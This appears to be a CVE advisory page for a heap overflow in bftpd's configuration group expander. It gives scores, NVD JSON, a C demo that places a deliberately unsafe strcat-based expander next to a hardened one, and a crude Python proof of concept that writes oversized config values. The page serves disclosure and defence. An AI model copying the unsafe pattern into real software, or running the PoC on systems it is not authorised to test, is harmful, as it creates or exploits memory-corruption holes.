Security Vulnerability Report
CVE-2025-11947 (CVSS 3.1 base score 4.5, MEDIUM)

Published: 2025-10-19 22:15:37
Last Modified: 2026-04-29 01:00:02

Description

A heap-based buffer overflow has been identified in bftpd up to and including version 6.2. The affected code is the function expand_groups in options.c, part of the Configuration File Handler. Manipulating the input that this function parses can write past the end of a heap allocation. The attack vector is local: because the flaw sits in the configuration handler, exploitation presupposes that the attacker can influence content bftpd reads as configuration, which is why the record rates attack complexity as High and exploitability as difficult. A public proof-of-concept exists (exploit maturity is recorded as PROOF_OF_CONCEPT in the CVSS 4.0 vector). The vendor was contacted early about this disclosure but did not respond.
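The bug class this record names (CWE-122, a heap-based overflow in a configuration parser that expands group references) is easy to reproduce in miniature. The C program below is an added illustration and is not bftpd's code: it does not reproduce options.c, and the fixed buffer size, the "@group" token syntax and the in-memory group table are all assumptions chosen for the demonstration. It places the unsafe pattern (fixed-size malloc followed by unbounded strcat) next to a hardened expander that measures the expansion first, allocates exactly that much, and rejects expansions above a caller-supplied cap instead of truncating silently.

```c
/* Added illustration of CWE-122 in a config-file group expander.
 * This is NOT bftpd's code; names, buffer sizes and data are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed in-memory group table so the example runs offline and never
 * touches /etc/group. Hypothetical data. */
struct group_entry { const char *name; const char *members; };
static const struct group_entry GROUPS[] = {
    { "ftpusers", "alice,bob" },
    { "staff",    "carol" },
    { NULL, NULL }
};

/* "@name" expands to the group's member list; anything else stays literal. */
static const char *expand_token(const char *tok) {
    if (tok[0] != '@') return tok;
    for (const struct group_entry *g = GROUPS; g->name; g++)
        if (strcmp(g->name, tok + 1) == 0) return g->members;
    return tok;                      /* unknown group: left as written */
}

#define FIXED_BUF 32   /* deliberately small so the overflow is obvious */

/* Vulnerable pattern: the output buffer size is fixed at allocation time
 * and bears no relation to the input. strcat() writes past the 32 bytes as
 * soon as the joined expansion exceeds 31 characters, corrupting heap
 * metadata or a neighbouring chunk. Shown for contrast; never call it on
 * untrusted input. */
char *expand_groups_unsafe(const char *spec) {
    char *out = malloc(FIXED_BUF);
    char *copy = strdup(spec);
    if (!out || !copy) { free(out); free(copy); return NULL; }
    out[0] = '\0';
    for (char *tok = strtok(copy, ","); tok; tok = strtok(NULL, ",")) {
        if (out[0]) strcat(out, ",");        /* no bounds check */
        strcat(out, expand_token(tok));      /* heap overflow when total > 31 */
    }
    free(copy);
    return out;
}

/* Pass 1: exact number of bytes (without the NUL) the expansion needs. */
size_t expanded_length(const char *spec) {
    size_t total = 0;
    int first = 1;
    char *copy = strdup(spec);
    if (!copy) return 0;
    for (char *tok = strtok(copy, ","); tok; tok = strtok(NULL, ",")) {
        total += strlen(expand_token(tok)) + (first ? 0 : 1);
        first = 0;
    }
    free(copy);
    return total;
}

/* Hardened version: size the buffer from pass 1, refuse anything above
 * max_len, and track the running offset so every write stays inside
 * the allocation. */
char *expand_groups_safe(const char *spec, size_t max_len) {
    size_t need = expanded_length(spec);
    if (need > max_len) return NULL;     /* oversized config value: reject */
    char *out = malloc(need + 1);
    char *copy = strdup(spec);
    if (!out || !copy) { free(out); free(copy); return NULL; }
    size_t used = 0;
    int first = 1;
    for (char *tok = strtok(copy, ","); tok; tok = strtok(NULL, ",")) {
        const char *exp = expand_token(tok);
        size_t len = strlen(exp);
        if (!first) out[used++] = ',';
        memcpy(out + used, exp, len);
        used += len;
        first = 0;
    }
    out[used] = '\0';
    free(copy);
    return out;
}

/* Result check: 1 if spec expands to expected under max_len, else 0. */
int expands_to(const char *spec, size_t max_len, const char *expected) {
    char *r = expand_groups_safe(spec, max_len);
    int ok = r != NULL && strcmp(r, expected) == 0;
    free(r);
    return ok;
}

int main(void) {
    const char *spec = "@ftpusers,@staff,dave,erin,frank,grace";
    printf("expansion needs %zu bytes; fixed buffer holds %d\n",
           expanded_length(spec), FIXED_BUF - 1);
    char *r = expand_groups_safe(spec, FIXED_BUF - 1);
    printf("safe expander, %d-byte cap: %s\n", FIXED_BUF - 1, r ? r : "rejected");
    free(r);
    r = expand_groups_safe(spec, 256);
    printf("safe expander, 256-byte cap: %s\n", r ? r : "rejected");
    free(r);
    /* expand_groups_unsafe(spec) would write 37 bytes into 32 here. */
    return 0;
}
```

The design point is the order of operations: a parser that reads untrusted configuration has to know the output size before it allocates, and a hard cap on the expanded value turns an overflow into a rejected config line. Building the unsafe variant with AddressSanitizer (gcc -fsanitize=address) and calling it on the 37-byte spec reports a heap-buffer-overflow at the strcat, which is the kind of evidence to collect when validating a report like this one.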

CVSS Details

All three scores below are the secondary metrics carried in the NVD record (see Raw JSON Data); NVD has not published its own primary score for this entry.

CVSS 3.1
Score: 4.5 (MEDIUM), exploitability 1.0, impact 3.4
Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

CVSS 4.0
Score: 1.1 (LOW)
Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P (all other metrics not defined)

CVSS 2.0
Score: 3.5 (LOW), exploitability 1.5, impact 6.4
Vector: AV:L/AC:H/Au:S/C:P/I:P/A:P

Weaknesses
CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)
CWE-122 (Heap-based Buffer Overflow)

Configurations (Affected Products)

No CPE configuration data is published for this entry (the NVD record's vulnStatus is "Deferred", so NVD has not enriched it). The affected range comes from the description only:

bftpd <= 6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note what it actually does: it only writes a configuration file containing oversized group values. The directive names it uses (user_group, group_N, listen on port 21) are the PoC author's and are not bftpd's documented KEY="value" configuration syntax, and the script does not verify that the values reach expand_groups(). Treat it as a template for a fuzzing input and confirm any crash under a debugger or an AddressSanitizer build before relying on it.
python
#!/usr/bin/env python3
# CVE-2025-11947 - bftpd expand_groups heap-based buffer overflow PoC
# This PoC demonstrates triggering the vulnerability by crafting a malicious
# configuration file that causes heap buffer overflow in expand_groups()
# in options.c of bftpd <= 6.2
import sys


def generate_malicious_config(output_path):
    """
    Generate a malicious bftpd configuration file that triggers heap-based
    buffer overflow in the expand_groups function.

    The expand_groups function parses group-related directives without
    proper bounds checking.
    """
    # Normal configuration header
    config = """# bftpd configuration file
# Malicious config to trigger CVE-2025-11947

# Set global options
global {
    user nobody
    group nogroup
    daemon off
    listen on port 21
}
"""

    # Craft an overly long group name to overflow the heap buffer
    # in expand_groups(). The function allocates a fixed-size buffer
    # on the heap and copies the group name without length validation.
    overflow_payload = "A" * 4096  # Exceed typical heap buffer size

    # Inject the malicious group directive
    config += f"\nuser_group {overflow_payload}\n"

    # Add additional overflow triggers
    for i in range(10):
        config += f"group_{i} {overflow_payload}\n"

    with open(output_path, "w") as f:
        f.write(config)

    print(f"[+] Malicious configuration written to {output_path}")
    print(f"[+] Payload size: {len(overflow_payload)} bytes per entry")


def trigger_vuln(config_path):
    """
    Trigger the vulnerability by starting bftpd with the malicious config.
    In a real attack scenario, this would be placed where bftpd reads it.
    """
    print(f"[*] To trigger: place config at {config_path}")
    print("[*] Then start bftpd or restart the service")
    print(f"[*] Command: bftpd -d -c {config_path}")


if __name__ == "__main__":
    config_path = sys.argv[1] if len(sys.argv) > 1 else "/tmp/bftpd.conf"
    generate_malicious_config(config_path)
    trigger_vuln(config_path)

References

As listed in the NVD record:

https://shimo.im/docs/rp3OMVMZZXc9lvkm/
https://vuldb.com/?id.329027
https://vuldb.com/?ctiid.329027
https://vuldb.com/?submit.673133

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11947", "sourceIdentifier": "[email protected]", "published": "2025-10-19T22:15:37.080", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in bftpd up to 6.2. Impacted is the function expand_groups of the file options.c of the component Configuration File Handler. Executing a manipulation can lead to heap-based buffer overflow. It is possible to launch the attack on the local host. Attacks of this nature are highly complex. The exploitability is considered difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "baseScore": 3.5, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "references": [{"url": "https://shimo.im/docs/rp3OMVMZZXc9lvkm/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329027", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329027", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.673133", "source": "[email protected]"}]}}